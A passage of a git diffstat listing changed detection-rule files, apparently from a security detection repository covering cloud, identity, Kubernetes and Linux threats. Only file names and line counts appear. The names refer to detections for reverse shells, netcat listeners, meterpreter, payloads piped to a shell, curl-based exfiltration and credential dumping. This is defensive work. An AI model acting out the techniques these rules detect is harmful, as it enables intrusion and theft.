...vasion_configuration_recorder_stopped.toml | 12 +- ...ion_ec2_serial_console_access_enabled.toml | 39 ++- ...defense_evasion_rds_instance_restored.toml | 35 +-- ...sion_s3_bucket_configuration_deletion.toml | 16 +- ..._s3_bucket_lifecycle_expiration_added.toml | 37 ++- .../aws/defense_evasion_sqs_purge_queue.toml | 33 +- ...ense_evasion_sts_get_federation_token.toml | 31 +- ...ec2_userdata_request_for_ec2_instance.toml | 22 +- ...eration_via_update_assume_role_policy.toml | 30 +- ...iscovery_ssm_inventory_reconnaissance.toml | 10 +- ...mbda_external_layer_added_to_function.toml | 33 +- ..._new_terms_cloudformation_createstack.toml | 10 +- ...tration_dynamodb_scan_by_unusual_user.toml | 25 +- .../aws/exfiltration_ec2_export_task.toml | 47 ++- ..._full_network_packet_capture_detected.toml | 43 ++- .../aws/exfiltration_rds_snapshot_export.toml | 28 +- ...icy_added_for_external_account_access.toml | 38 ++- ...bucket_policy_added_for_public_access.toml | 38 ++- ...ns_rare_protocol_subscription_by_user.toml | 46 ++- ..._eventbridge_rule_disabled_or_deleted.toml | 26 +- ..._s3_bucket_enumeration_or_brute_force.toml | 39 ++- .../impact_cloudtrail_logging_updated.toml | 45 ++- .../impact_cloudwatch_log_group_deletion.toml | 34 ++- ...impact_cloudwatch_log_stream_deletion.toml | 34 ++- .../impact_ec2_disable_ebs_encryption.toml | 34 ++- ...mpact_ec2_ebs_snapshot_access_removed.toml | 8 +- .../aws/impact_iam_deactivate_mfa_device.toml | 36 ++- ..._cluster_deletion_protection_disabled.toml | 27 +- .../aws/impact_rds_snapshot_deleted.toml | 11 +- ...t_object_uploaded_with_ransom_keyword.toml | 18 +- .../initial_access_console_login_root.toml | 31 +- .../aws/initial_access_password_recovery.toml | 15 +- ...tance_connect_ssh_public_key_uploaded.toml | 39 ++- ...l_movement_ec2_instance_console_login.toml | 75 +++-- ...ns_topic_message_publish_by_rare_user.toml | 44 ++- .../ml_cloudtrail_error_message_spike.toml | 36 ++- .../aws/ml_cloudtrail_rare_error_code.toml | 60 +++- 
.../ml_cloudtrail_rare_method_by_city.toml | 20 +- .../ml_cloudtrail_rare_method_by_country.toml | 20 +- .../ml_cloudtrail_rare_method_by_user.toml | 57 +++- ...ttempt_to_register_virtual_mfa_device.toml | 17 +- .../persistence_ec2_network_acl_creation.toml | 27 +- ...e_ec2_route_table_modified_or_deleted.toml | 29 +- ..._group_configuration_change_detection.toml | 23 +- ..._iam_api_calls_via_user_session_token.toml | 32 +- ...nce_iam_create_login_profile_for_root.toml | 16 +- .../aws/persistence_iam_group_creation.toml | 16 +- ...persistence_iam_oidc_provider_created.toml | 32 +- ...ce_iam_roles_anywhere_profile_created.toml | 33 +- ...usted_anchor_created_with_external_ca.toml | 13 +- ...persistence_iam_saml_provider_created.toml | 31 +- ...oor_invoke_function_for_any_principal.toml | 30 +- ...nce_rds_db_instance_password_modified.toml | 35 ++- .../persistence_rds_instance_made_public.toml | 32 +- ...oute_53_domain_transfer_lock_disabled.toml | 33 +- ...domain_transferred_to_another_account.toml | 28 +- ..._53_hosted_zone_associated_with_a_vpc.toml | 46 ++- .../aws/persistence_route_table_created.toml | 29 +- ...e_sensitive_operations_via_cloudshell.toml | 27 +- ...sistence_sts_assume_role_with_new_mfa.toml | 58 ++-- ...tratoraccess_policy_attached_to_group.toml | 24 +- ...stratoraccess_policy_attached_to_role.toml | 24 +- ...stratoraccess_policy_attached_to_user.toml | 30 +- ...tomer_managed_policy_attached_to_role.toml | 35 +-- ..._escalation_iam_saml_provider_updated.toml | 31 +- ...alation_iam_update_assume_role_policy.toml | 43 ++- ...escalation_role_assumption_by_service.toml | 42 ++- ...ge_escalation_role_assumption_by_user.toml | 36 ++- ...oot_from_rare_user_and_member_account.toml | 24 +- ...rivilege_escalation_sts_role_chaining.toml | 62 ++-- ...opment_sns_topic_created_by_rare_user.toml | 27 +- ..._bedrock_execution_without_guardrails.toml | 50 +-- ...ls_multiple_violations_by_single_user.toml | 24 +- ...multiple_violations_in_single_request.toml | 24 
+- ...confidence_misconduct_blocks_detected.toml | 24 +- ...k_high_resource_consumption_detection.toml | 82 +---- ...attempts_to_use_denied_models_by_user.toml | 24 +- ...ve_information_policy_blocks_detected.toml | 24 +- ...multiple_topic_policy_blocks_detected.toml | 24 +- ...ation_exception_errors_by_single_user.toml | 26 +- ..._multiple_word_policy_blocks_detected.toml | 29 +- ...point_access_from_unusual_application.toml | 21 +- ...ss_by_unusual_public_client_via_graph.toml | 8 +- ...s_azure_entra_susp_device_code_signin.toml | 21 +- ...s_azure_storage_account_keys_accessed.toml | 31 +- ...s_entra_id_excessive_account_lockouts.toml | 17 +- ...ial_access_entra_id_suspicious_signin.toml | 39 ++- ...ss_entra_id_totp_brute_force_attempts.toml | 10 +- ..._access_key_vault_excessive_retrieval.toml | 33 +- ...ccess_storage_account_key_regenerated.toml | 28 +- ...se_evasion_automation_runbook_deleted.toml | 21 +- ...insights_diagnostic_settings_deletion.toml | 10 +- ...nse_evasion_kubernetes_events_deleted.toml | 16 +- ...ense_evasion_network_watcher_deletion.toml | 10 +- ...curity_alert_suppression_rule_created.toml | 8 +- ...overy_bloodhound_user_agents_detected.toml | 24 +- ...d_teamfiltration_user_agents_detected.toml | 82 +++-- ...ge_blob_container_access_modification.toml | 29 +- ...torage_blob_download_azcopy_sas_token.toml | 33 +- ...ct_azure_compute_vm_snapshot_deletion.toml | 8 +- ...t_azure_compute_vm_snapshot_deletions.toml | 8 +- ...impact_azure_storage_account_deletion.toml | 10 +- ...ure_storage_account_deletion_multiple.toml | 10 +- ...ct_key_vault_modified_by_unusual_user.toml | 10 +- .../azure/impact_kubernetes_pod_deleted.toml | 10 +- ...act_resources_resource_group_deletion.toml | 22 +- ...ster_credential_access_unusual_source.toml | 38 +-- ..._actor_token_user_impersonation_abuse.toml | 48 ++- ...d_device_code_auth_with_broker_client.toml | 51 ++-- ...s_entra_id_external_guest_user_invite.toml | 26 +- ..._id_federated_login_by_unusual_client.toml 
| 51 ++-- ...a_id_first_time_seen_device_code_auth.toml | 21 +- ...ingle_session_from_multiple_addresses.toml | 41 ++- ...sent_grant_via_registered_application.toml | 47 +-- ..._code_grant_unusual_app_resource_user.toml | 42 ++- ...via_first_party_microsoft_application.toml | 46 ++- ...tra_id_oauth_user_impersonation_scope.toml | 29 +- ...ial_access_entra_id_powershell_signin.toml | 24 +- ...a_id_protection_sign_in_risk_detected.toml | 57 +++- ...ntra_id_protection_user_risk_detected.toml | 43 ++- ...tra_id_rare_app_id_for_principal_auth.toml | 49 +-- ...cation_requirement_for_principal_user.toml | 37 ++- ...ous_oauth_flow_via_auth_broker_to_drs.toml | 49 ++- ...ph_first_occurrence_of_client_request.toml | 41 +-- .../azure/ml_azure_event_failures.toml | 33 +- .../azure/ml_azure_rare_event_failures.toml | 60 +++- .../azure/ml_azure_rare_method_by_city.toml | 21 +- .../ml_azure_rare_method_by_country.toml | 21 +- .../azure/ml_azure_rare_method_by_user.toml | 61 +++- ...ersistence_automation_account_created.toml | 23 +- ...ersistence_automation_webhook_created.toml | 15 +- ...id_conditional_access_policy_modified.toml | 32 +- ...id_global_administrator_role_assigned.toml | 34 +-- ...stence_entra_id_mfa_disabled_for_user.toml | 32 +- ..._entra_id_pim_user_added_global_admin.toml | 24 +- ...ged_identity_management_role_modified.toml | 44 +-- ...rt_to_prt_transition_from_user_device.toml | 40 ++- ...d_service_principal_credentials_added.toml | 32 +- ...e_principal_federated_issuer_modified.toml | 36 ++- ...nant_domain_federation_via_audit_logs.toml | 47 ++- ..._added_as_owner_for_azure_application.toml | 22 +- ..._as_owner_for_azure_service_principal.toml | 33 +- ...id_user_signed_in_from_unusual_device.toml | 49 +-- ...sistence_event_hub_created_or_updated.toml | 32 +- ...ce_graph_eam_addition_or_modification.toml | 30 +- ..._protect_alert_followed_by_device_reg.toml | 13 +- ...ure_rbac_administrator_roles_assigned.toml | 29 +- 
..._elevate_to_user_administrator_access.toml | 32 +- ...on_kubernetes_aks_rolebinding_created.toml | 44 +-- ...a_id_custom_domain_added_and_verified.toml | 19 +- ...openai_denial_of_ml_service_detection.toml | 41 +-- ...ai_insecure_output_handling_detection.toml | 22 +- .../azure_openai_model_theft_detection.toml | 62 +--- .../command_and_control_beaconing.toml | 16 +- ...and_control_beaconing_high_confidence.toml | 16 +- ...socks_proxy_detected_inside_container.toml | 8 +- ...teractive_file_download_from_internet.toml | 51 +++- ...control_tunneling_and_port_forwarding.toml | 7 +- ..._files_compression_inside_a_container.toml | 141 +++++++++ ...r_passwords_search_inside_a_container.toml | 24 +- ...ss_service_account_token_or_cert_read.toml | 7 +- ..._decoded_payload_piped_to_interpreter.toml | 64 ++-- ...le_creation_execution_deletion_cradle.toml | 152 ++++++++++ ...s_execution_from_suspicious_directory.toml | 49 +-- ...ed_object_modified_inside_a_container.toml | 29 +- ...potential_evasion_via_encoded_payload.toml | 45 ++- .../discovery_dns_enumeration.toml | 12 +- .../discovery_environment_enumeration.toml | 7 +- ...overy_kubelet_certificate_file_access.toml | 103 +++++++ ..._enumeration_from_interactive_process.toml | 12 +- ...covery_service_account_namespace_read.toml | 7 +- ...work_tool_launched_inside_a_container.toml | 44 ++- .../discovery_tool_enumeration.toml | 7 +- ...ct_interactive_kubernetes_api_request.toml | 151 ++++++++++ ...e_file_creation_followed_by_execution.toml | 31 +- ...e_creation_in_system_binary_locations.toml | 115 +++++++ ...shell_spawned_from_inside_a_container.toml | 7 +- .../execution_kubeletctl_execution.toml | 13 +- ...stener_established_inside_a_container.toml | 127 ++++++++ ...payload_downloaded_and_piped_to_shell.toml | 136 +++++++++ ...irect_kubelet_access_via_process_args.toml | 107 +++++++ ...ecutable_via_chmod_inside_a_container.toml | 124 ++++++++ ...ractive_interpreter_command_execution.toml | 73 +++-- 
...ication_of_persistence_relevant_files.toml | 72 +++-- ..._keys_modification_inside_a_container.toml | 40 ++- ...e_suspicious_echo_or_printf_execution.toml | 162 ++++++++++ ...ous_webserver_child_process_execution.toml | 284 ++++++++++++++++++ ...berarkpas_error_audit_event_promotion.toml | 22 +- ...commended_events_to_monitor_promotion.toml | 22 +- ...ration_ml_high_bytes_destination_port.toml | 26 +- ...high_bytes_written_to_external_device.toml | 8 +- ...re_process_writing_to_external_device.toml | 8 +- ...d_control_ml_dga_high_sum_probability.toml | 8 +- ...istence_suspicious_file_modifications.toml | 124 ++++---- ...collection_gcp_pub_sub_topic_creation.toml | 15 +- ...nse_evasion_gcp_firewall_rule_created.toml | 8 +- ...nse_evasion_gcp_firewall_rule_deleted.toml | 8 +- ...se_evasion_gcp_firewall_rule_modified.toml | 8 +- ...e_evasion_gcp_logging_bucket_deletion.toml | 8 +- ...nse_evasion_gcp_logging_sink_deletion.toml | 8 +- ...ion_gcp_pub_sub_subscription_deletion.toml | 26 +- ...se_evasion_gcp_pub_sub_topic_deletion.toml | 26 +- ...p_storage_bucket_permissions_modified.toml | 45 +-- ...virtual_private_cloud_network_deleted.toml | 31 +- ...p_virtual_private_cloud_route_created.toml | 19 +- ...p_virtual_private_cloud_route_deleted.toml | 19 +- ...tration_gcp_logging_sink_modification.toml | 29 +- ...l_access_gcp_iam_custom_role_creation.toml | 47 ++- .../gcp/ml_gcp_error_message_spike.toml | 33 +- .../gcp/ml_gcp_rare_error_code.toml | 59 +++- .../gcp/ml_gcp_rare_method_by_city.toml | 22 +- .../gcp/ml_gcp_rare_method_by_country.toml | 22 +- .../gcp/ml_gcp_rare_method_by_user.toml | 57 +++- ..._gcp_iam_service_account_key_deletion.toml | 26 +- ...e_gcp_key_created_for_service_account.toml | 8 +- ...rsistence_gcp_service_account_created.toml | 8 +- ...hub_protected_branch_settings_changed.toml | 10 +- .../github/execution_github_app_deleted.toml | 25 +- ..._high_number_of_cloned_repos_from_pat.toml | 37 +-- ...multiple_behavior_alerts_from_account.toml | 10 +- 
.../execution_new_github_app_installed.toml | 25 +- ...thub_private_repository_turned_public.toml | 24 +- ...ration_high_number_of_cloning_by_user.toml | 38 ++- ...b_repository_activity_from_unusual_ip.toml | 52 +++- ...umber_of_closed_pull_requests_by_user.toml | 45 ++- ...protected_branch_force_pushes_by_user.toml | 45 ++- ...protected_branch_force_pushes_by_user.toml | 42 ++- ...github_actions_bot_first_push_to_repo.toml | 50 +-- ...ub_actions_workflow_injection_blocked.toml | 29 +- ...ss_github_register_self_hosted_runner.toml | 14 +- .../persistence_github_org_owner_added.toml | 44 ++- .../github/persistence_new_pat_created.toml | 36 ++- ...tence_organization_owner_role_granted.toml | 32 +- ...ship_transferred_via_google_workspace.toml | 29 +- ...yption_key_accessed_by_anonymous_user.toml | 28 +- ...ed_from_blocklist_in_google_workspace.toml | 16 +- ...d_to_google_workspace_trusted_domains.toml | 16 +- ...marketplace_modified_to_allow_any_app.toml | 16 +- ...le_workspace_mfa_enforcement_disabled.toml | 44 +-- ..._user_added_to_google_workspace_group.toml | 30 +- ...ogle_workspace_suspended_user_renewed.toml | 24 +- ...ed_to_external_drive_with_app_consent.toml | 41 ++- ...tion_added_to_google_workspace_domain.toml | 8 +- ..._google_workspace_2sv_policy_disabled.toml | 34 +-- ...workspace_admin_role_assigned_to_user.toml | 31 +- ...e_workspace_custom_admin_role_created.toml | 32 +- ...le_workspace_password_policy_modified.toml | 25 +- ...stence_google_workspace_role_modified.toml | 32 +- ...pace_user_organizational_unit_changed.toml | 31 +- ...led_for_google_workspace_organization.toml | 34 +-- ...ure_arc_proxy_secret_configmap_access.toml | 35 ++- .../defense_evasion_events_deleted.toml | 7 +- ...covery_denied_service_account_request.toml | 29 +- ...covery_suspicious_self_subject_review.toml | 8 +- ...ymous_create_update_patch_pod_request.toml | 7 +- .../execution_forbidden_creation_request.toml | 21 +- ...bidden_request_from_unsual_user_agent.toml | 22 +- 
...nusual_request_response_by_user_agent.toml | 23 +- ...l_access_anonymous_request_authorized.toml | 12 +- ...ed_service_created_with_type_nodeport.toml | 18 +- ...ted_with_excessive_linux_capabilities.toml | 26 +- ...e_escalation_pod_created_with_hostipc.toml | 26 +- ...calation_pod_created_with_hostnetwork.toml | 26 +- ...e_escalation_pod_created_with_hostpid.toml | 26 +- ...reated_with_sensitive_hostpath_volume.toml | 26 +- ...ege_escalation_privileged_pod_created.toml | 26 +- ...nge_followed_by_workload_modification.toml | 36 +-- ...e_workload_modification_by_user_agent.toml | 49 ++- ..._service_account_rbac_write_operation.toml | 14 +- ...ignment_of_controller_service_account.toml | 20 +- ...ovement_ml_high_mean_rdp_process_args.toml | 35 +-- ...ent_ml_high_mean_rdp_session_duration.toml | 14 +- ...ral_movement_ml_high_remote_file_size.toml | 11 +- ...ml_high_variance_rdp_session_duration.toml | 14 +- ...ovement_ml_rare_remote_file_directory.toml | 11 +- ...ovement_ml_rare_remote_file_extension.toml | 11 +- ...spike_in_connections_from_a_source_ip.toml | 14 +- ...ke_in_connections_to_a_destination_ip.toml | 14 +- ...al_movement_ml_spike_in_rdp_processes.toml | 14 +- ...ent_ml_spike_in_remote_file_transfers.toml | 30 +- ...nt_ml_unusual_time_for_an_rdp_session.toml | 14 +- ...ion_onedrive_excessive_file_downloads.toml | 24 +- ...arepoint_file_download_via_powershell.toml | 25 +- ...a_id_device_reg_via_oauth_redirection.toml | 37 ++- ...access_identity_user_account_lockouts.toml | 15 +- ...on_entra_id_susp_oauth2_authorization.toml | 36 ++- ...e_evasion_exchange_dlp_policy_removed.toml | 7 +- ...ange_mailbox_audit_bypass_association.toml | 11 +- ...change_malware_filter_policy_deletion.toml | 8 +- ...sion_exchange_malware_filter_rule_mod.toml | 8 +- ...on_exchange_safe_attach_rule_disabled.toml | 8 +- ...on_sharepoint_sharing_policy_weakened.toml | 14 +- ..._teams_custom_app_interaction_allowed.toml | 11 +- ...evasion_teams_external_access_enabled.toml | 11 +- 
...very_sharepoint_sensitive_term_search.toml | 32 +- ...tion_exchange_transport_rule_creation.toml | 22 +- ..._exchange_transport_rule_modification.toml | 22 +- ...sent_grant_via_registered_application.toml | 42 ++- ...via_first_party_microsoft_application.toml | 34 ++- ..._identity_unusual_sso_errors_for_user.toml | 38 ++- ...ompliance_user_reported_phish_malware.toml | 15 +- ...ce_user_restricted_from_sending_email.toml | 10 +- ...al_movement_onedrive_malware_uploaded.toml | 21 +- ..._movement_sharepoint_malware_uploaded.toml | 21 +- ...a_id_global_administrator_role_assign.toml | 34 +-- ...e_exchange_management_role_assignment.toml | 30 +- ...picious_mailbox_permission_delegation.toml | 34 +-- ...nge_new_or_modified_federation_domain.toml | 43 +-- ...harepoint_site_collection_admin_added.toml | 20 +- ...l_access_attempted_bypass_of_okta_mfa.toml | 37 +-- ...mpts_to_brute_force_okta_user_account.toml | 8 +- ...vents_from_single_device_behind_proxy.toml | 18 +- ..._token_hashes_for_single_okta_session.toml | 29 +- ...multiple_user_agent_os_authentication.toml | 29 +- ...ccess_okta_aitm_session_cookie_replay.toml | 33 +- ...users_with_the_same_device_token_hash.toml | 12 +- ...kta_brute_force_device_token_rotation.toml | 8 +- ...tial_access_user_impersonation_access.toml | 26 +- ...tempt_to_deactivate_okta_network_zone.toml | 10 +- ...n_attempt_to_delete_okta_network_zone.toml | 10 +- ..._app_client_credential_token_exchange.toml | 32 +- ...kta_attempt_to_deactivate_okta_policy.toml | 16 +- ...ttempt_to_deactivate_okta_policy_rule.toml | 10 +- ...on_okta_attempt_to_delete_okta_policy.toml | 20 +- ...ta_attempt_to_delete_okta_policy_rule.toml | 16 +- ...on_okta_attempt_to_modify_okta_policy.toml | 16 +- ...ta_attempt_to_modify_okta_policy_rule.toml | 16 +- ...ser_password_reset_or_unlock_attempts.toml | 37 ++- ...ttempt_to_deactivate_okta_application.toml | 27 +- ...ta_attempt_to_modify_okta_application.toml | 26 +- .../okta/impact_possible_okta_dos_attack.toml | 
11 +- ...rrence_user_session_started_via_proxy.toml | 14 +- ...ta_user_attempted_unauthorized_access.toml | 29 +- ...ss_sign_in_events_via_third_party_idp.toml | 44 +-- ...cation_sso_from_unknown_client_device.toml | 35 +-- ...icious_activity_reported_by_okta_user.toml | 51 +++- ...ent_multiple_sessions_for_single_user.toml | 20 +- ...eatinsight_threat_suspected_promotion.toml | 32 +- ...tor_privileges_assigned_to_okta_group.toml | 31 +- ...inistrator_role_assigned_to_okta_user.toml | 33 +- ...ence_attempt_to_create_okta_api_token.toml | 14 +- ...mfa_deactivation_with_no_reactivation.toml | 29 +- ..._or_delete_application_sign_on_policy.toml | 21 +- ...login_to_okta_account_after_mfa_reset.toml | 38 +-- ...unt_privileged_process_events_by_user.toml | 11 +- ..._process_command_line_entropy_by_user.toml | 28 +- ...l_linux_rare_process_executed_by_user.toml | 11 +- ..._high_sum_concurrent_sessions_by_user.toml | 33 +- ...access_ml_okta_rare_host_name_by_user.toml | 8 +- ...cess_ml_okta_rare_region_name_by_user.toml | 8 +- ...access_ml_okta_rare_source_ip_by_user.toml | 22 +- ..._group_application_assignment_changes.toml | 30 +- ...okta_spike_in_group_lifecycle_changes.toml | 33 +- ...kta_spike_in_group_membership_changes.toml | 33 +- ...okta_spike_in_group_privilege_changes.toml | 30 +- ..._in_user_lifecycle_management_changes.toml | 27 +- ...ws_high_count_group_management_events.toml | 35 +-- ...ndows_high_count_special_logon_events.toml | 8 +- ...gh_count_special_privilege_use_events.toml | 13 +- ..._count_user_account_management_events.toml | 36 +-- ...ss_ml_windows_rare_group_name_by_user.toml | 44 +-- ...ndows_rare_privilege_assigned_to_user.toml | 8 +- ...s_ml_windows_rare_region_name_by_user.toml | 19 +- ...se_evasion_ml_rare_process_for_a_host.toml | 15 +- ..._ml_rare_process_for_a_parent_process.toml | 15 +- ...se_evasion_ml_rare_process_for_a_user.toml | 32 +- ...icious_windows_event_high_probability.toml | 20 +- ...picious_windows_event_low_probability.toml 
| 20 +- ...ous_windows_process_cluster_from_host.toml | 15 +- ...s_process_cluster_from_parent_process.toml | 15 +- ...ous_windows_process_cluster_from_user.toml | 15 +- ...and_control_aws_cli_endpoint_url_used.toml | 14 +- ...mand_and_control_cat_network_activity.toml | 30 +- ...and_control_cupsd_foomatic_rip_netcon.toml | 42 ++- ...and_control_curl_socks_proxy_detected.toml | 8 +- ..._git_repo_or_file_download_to_sus_dir.toml | 8 +- ...nd_and_control_ip_forwarding_activity.toml | 13 +- ...ntrol_kubectl_networking_modification.toml | 12 +- ...mand_and_control_linux_kworker_netcon.toml | 43 ++- ...nd_control_linux_proxychains_activity.toml | 8 +- ..._and_control_linux_ssh_x11_forwarding.toml | 33 +- ...linux_suspicious_proxychains_activity.toml | 8 +- ...l_linux_tunneling_and_port_forwarding.toml | 7 +- ...ontrol_linux_tunneling_via_ssh_option.toml | 7 +- ...trol_potential_tunneling_command_line.toml | 7 +- ...mand_and_control_telegram_api_request.toml | 23 +- ...d_and_control_tunneling_via_earthworm.toml | 7 +- ...ial_access_collection_sensitive_files.toml | 37 +-- ...ve_files_compression_inside_container.toml | 38 +-- ...ntial_access_gdb_init_process_hooking.toml | 7 +- ...credential_access_gdb_process_hooking.toml | 36 ++- .../credential_access_gh_auth_via_nodejs.toml | 32 +- ...ernetes_service_account_secret_access.toml | 40 ++- ...edential_access_manual_memory_dumping.toml | 7 +- ...tential_linux_ssh_bruteforce_external.toml | 7 +- ...tential_linux_ssh_bruteforce_internal.toml | 7 +- ...ss_potential_password_spraying_attack.toml | 7 +- ...ntial_successful_linux_ssh_bruteforce.toml | 7 +- ...ential_access_proc_credential_dumping.toml | 7 +- ..._or_passwords_search_inside_container.toml | 24 +- ...cess_ssh_password_grabbing_via_strace.toml | 31 +- ...nse_evasion_apparmor_policy_violation.toml | 7 +- ...ion_attempt_to_disable_auditd_service.toml | 8 +- ...tempt_to_disable_iptables_or_firewall.toml | 8 +- ...ion_attempt_to_disable_syslog_service.toml | 7 +- 
...evasion_authorized_keys_file_deletion.toml | 28 +- ...ense_evasion_base64_decoding_activity.toml | 35 ++- ...binary_copied_to_suspicious_directory.toml | 7 +- ...defense_evasion_bpf_program_tampering.toml | 7 +- ...ense_evasion_clear_kernel_ring_buffer.toml | 12 +- ...sion_curl_or_wget_executed_via_lolbin.toml | 67 +++-- ...nse_evasion_directory_creation_in_bin.toml | 23 +- ...fense_evasion_disable_selinux_attempt.toml | 7 +- ...doas_configuration_creation_or_rename.toml | 31 +- ...defense_evasion_file_mod_writable_dir.toml | 8 +- ...hex_payload_execution_via_commandline.toml | 52 +++- ...ion_hex_payload_execution_via_utility.toml | 22 +- ...nse_evasion_hidden_directory_creation.toml | 22 +- .../defense_evasion_hidden_file_dir_tmp.toml | 10 +- ...on_interactive_shell_from_system_user.toml | 32 +- ...rpreter_launched_from_decoded_payload.toml | 59 ++-- ...defense_evasion_journalctl_clear_logs.toml | 12 +- ...defense_evasion_kernel_module_removal.toml | 20 +- ...defense_evasion_kill_command_executed.toml | 45 ++- ...defense_evasion_kthreadd_masquerading.toml | 13 +- .../defense_evasion_ld_preload_cmdline.toml | 74 ++++- .../linux/defense_evasion_ld_so_creation.toml | 46 ++- ...evasion_multi_base64_decoding_attempt.toml | 61 +++- ...asion_potential_kubectl_impersonation.toml | 40 ++- ...vasion_potential_kubectl_masquerading.toml | 7 +- ...ense_evasion_potential_proot_exploits.toml | 33 +- ..._evasion_prctl_process_name_tampering.toml | 8 +- .../defense_evasion_rename_esxi_files.toml | 34 ++- ...ense_evasion_ssl_certificate_deletion.toml | 12 +- ...s_utility_executed_via_tmux_or_screen.toml | 8 +- ...fense_evasion_suspicious_path_mounted.toml | 7 +- ...vasion_symlink_binary_to_writable_dir.toml | 32 +- ...vasion_sysctl_kernel_feature_activity.toml | 22 +- ...ense_evasion_unusual_preload_env_vars.toml | 31 +- ...efense_evasion_user_or_group_deletion.toml | 22 +- ...r_log_file_creation_by_unsual_process.toml | 47 ++- .../discovery_dynamic_linker_via_od.toml | 8 +- 
.../discovery_esxi_software_via_find.toml | 7 +- .../discovery_esxi_software_via_grep.toml | 8 +- ...ion_discovery_via_kprobes_and_tracefs.toml | 35 ++- .../discovery_kernel_module_enumeration.toml | 9 +- rules/linux/discovery_kernel_seeking.toml | 30 +- rules/linux/discovery_kernel_unpacking.toml | 30 +- .../discovery_kubeconfig_file_discovery.toml | 38 +-- ...iscovery_kubectl_permission_discovery.toml | 8 +- .../linux/discovery_linux_hping_activity.toml | 11 +- .../linux/discovery_linux_nping_activity.toml | 10 +- ..._mount_discovery_via_exports_or_fstab.toml | 8 +- .../discovery_pam_version_discovery.toml | 48 ++- .../linux/discovery_ping_sweep_detected.toml | 8 +- .../discovery_polkit_version_discovery.toml | 8 +- ...ivate_key_password_searching_activity.toml | 29 +- rules/linux/discovery_proc_maps_read.toml | 34 ++- .../linux/discovery_process_capabilities.toml | 8 +- ...curity_file_access_via_common_utility.toml | 37 +-- ...very_sudo_allowed_command_enumeration.toml | 11 +- .../discovery_suid_sguid_enumeration.toml | 38 ++- ...etwork_tool_launched_inside_container.toml | 50 ++- ...ry_suspicious_which_command_execution.toml | 11 +- ...overy_unusual_user_enumeration_via_id.toml | 23 +- ...covery_virtual_machine_fingerprinting.toml | 43 +-- .../discovery_yum_dnf_plugin_detection.toml | 13 +- ...tion_abnormal_process_id_file_created.toml | 31 +- ...tion_cupsd_foomatic_rip_file_creation.toml | 12 +- ..._cupsd_foomatic_rip_lp_user_execution.toml | 40 ++- ...on_cupsd_foomatic_rip_shell_execution.toml | 14 +- ...omatic_rip_suspicious_child_execution.toml | 40 ++- ...nnection_from_entrypoint_in_container.toml | 38 ++- .../execution_executable_stack_execution.toml | 19 +- ...n_file_execution_followed_by_deletion.toml | 42 +-- ...executable_via_chmod_inside_container.toml | 25 +- ...er_or_listener_established_via_netcat.toml | 46 +-- .../execution_kubectl_apply_pod_from_url.toml | 12 +- ...s_direct_api_request_via_curl_or_wget.toml | 37 ++- 
.../execution_nc_listener_via_rlwrap.toml | 31 +- ...ion_netcon_from_rwx_mem_region_binary.toml | 41 ++- ...cution_network_event_post_compilation.toml | 45 +-- rules/linux/execution_perl_tty_shell.toml | 7 +- ...xecution_potential_hack_tool_executed.toml | 99 +----- ..._overly_permissive_container_creation.toml | 25 +- ...rocess_backgrounded_by_unusual_parent.toml | 50 +-- ..._process_started_from_process_id_file.toml | 33 +- ...ss_started_in_shared_memory_directory.toml | 32 +- rules/linux/execution_python_tty_shell.toml | 7 +- .../execution_python_webserver_spawned.toml | 15 +- .../execution_shell_evasion_linux_binary.toml | 30 +- ...cution_shell_openssl_client_or_server.toml | 38 ++- ...xecution_shell_via_background_process.toml | 40 ++- ...ion_shell_via_child_tcp_utility_linux.toml | 37 ++- ...ecution_shell_via_java_revshell_linux.toml | 15 +- ...on_shell_via_lolbin_interpreter_linux.toml | 47 ++- ...execution_shell_via_meterpreter_linux.toml | 50 +-- ...execution_shell_via_suspicious_binary.toml | 37 ++- ...ution_shell_via_tcp_cli_utility_linux.toml | 37 ++- ...ution_shell_via_udp_cli_utility_linux.toml | 37 ++- ...traction_or_decrompression_via_funzip.toml | 37 ++- ...us_executable_running_system_commands.toml | 53 ++-- ...icious_mining_process_creation_events.toml | 45 ++- ...execution_suspicious_mkfifo_execution.toml | 37 ++- ..._container_creation_command_execution.toml | 32 +- ..._system_binary_file_permission_change.toml | 28 +- rules/linux/execution_tc_bpf_filter.toml | 34 ++- ...nknown_rwx_mem_region_binary_executed.toml | 14 +- .../execution_unusual_kthreadd_execution.toml | 48 ++- ...ual_path_invocation_from_command_line.toml | 38 ++- .../execution_unusual_pkexec_execution.toml | 40 ++- ...tion_potential_curl_data_exfiltration.toml | 23 +- ...ntial_data_splitting_for_exfiltration.toml | 7 +- ...filtration_potential_database_dumping.toml | 20 +- ...tion_potential_wget_data_exfiltration.toml | 18 +- ...nusual_file_transfer_utility_launched.toml | 25 +- 
.../impact_memory_swap_modification.toml | 33 +- ...otential_bruteforce_malware_infection.toml | 56 +++- ..._first_time_public_key_authentication.toml | 34 +-- ...sful_ssh_authentication_by_unusual_ip.toml | 34 +-- ...ul_ssh_authentication_by_unusual_user.toml | 34 +-- ...ess_telnet_auth_bypass_via_user_envar.toml | 31 +- ...ral_movement_kubeconfig_file_activity.toml | 57 +++- ...lateral_movement_ssh_it_worm_download.toml | 42 ++- ...ment_telnet_network_activity_external.toml | 24 +- ...istence_apt_package_manager_execution.toml | 59 +++- ...nce_apt_package_manager_file_creation.toml | 30 +- ...ersistence_apt_package_manager_netcon.toml | 53 ++-- rules/linux/persistence_at_job_creation.toml | 20 +- rules/linux/persistence_boot_file_copy.toml | 53 +++- .../persistence_bpf_probe_write_user.toml | 28 +- .../persistence_bpf_program_or_map_load.toml | 35 ++- .../persistence_chkconfig_service_add.toml | 7 +- ...credential_access_modify_ssh_binaries.toml | 54 +++- .../linux/persistence_cron_job_creation.toml | 43 ++- .../persistence_dbus_service_creation.toml | 14 +- ...e_dbus_unsual_daemon_parent_execution.toml | 52 +++- ..._package_manager_plugin_file_creation.toml | 37 ++- ...kage_installation_from_unusual_parent.toml | 40 ++- .../persistence_dpkg_unusual_execution.toml | 39 ++- .../persistence_dracut_module_creation.toml | 51 +++- .../persistence_dynamic_linker_backup.toml | 31 +- ...ersistence_extract_initramfs_via_cpio.toml | 12 +- .../linux/persistence_git_hook_execution.toml | 44 ++- .../persistence_git_hook_file_creation.toml | 52 +++- rules/linux/persistence_git_hook_netcon.toml | 41 ++- ...ersistence_git_hook_process_execution.toml | 45 ++- ...rsistence_grub_configuration_creation.toml | 25 +- rules/linux/persistence_grub_makeconfig.toml | 12 +- .../persistence_init_d_file_creation.toml | 7 +- ...persistence_insmod_kernel_module_load.toml | 28 +- ...ersistence_kde_autostart_modification.toml | 7 +- .../linux/persistence_kernel_driver_load.toml | 32 +- 
